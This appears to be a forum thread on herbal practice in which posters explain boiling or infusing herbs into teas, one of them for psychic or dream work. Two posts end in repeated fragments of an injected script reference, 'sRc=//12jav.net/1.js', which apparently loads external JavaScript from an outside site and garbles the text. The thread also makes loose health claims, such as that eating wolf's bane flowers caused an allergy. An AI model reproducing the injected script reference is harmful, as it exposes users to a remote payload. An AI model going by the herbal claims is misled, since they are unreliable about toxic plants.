You don't liquefy the herbs, you boil them in the water (like a tea) or grind them up very fine.

I second that fully. Make sure you KNOW that whatever your putting into your body is not poisonous, and that you are not allergic to it. I found out the hard way in my early years of practice that the flowers of the wolf's bane plant are poisoness. Because I ingested them, I developed an allergy to them that makes a rash come out on my skin whenever I mess with the flowers of the plany. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

There is also a process(can't remember what its called) where u neither grind up the stuff in the water, but like boil it then drain off the water or something. If I could rememebr the name I know it would make sooo much more sense, lol. I belive the process is called infusing were you boil the herbs ,strain them making them into a tea usually a good thing to do when inducing psychic ability ( or asking the godesses/gods for clarify a situation in a dream . sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
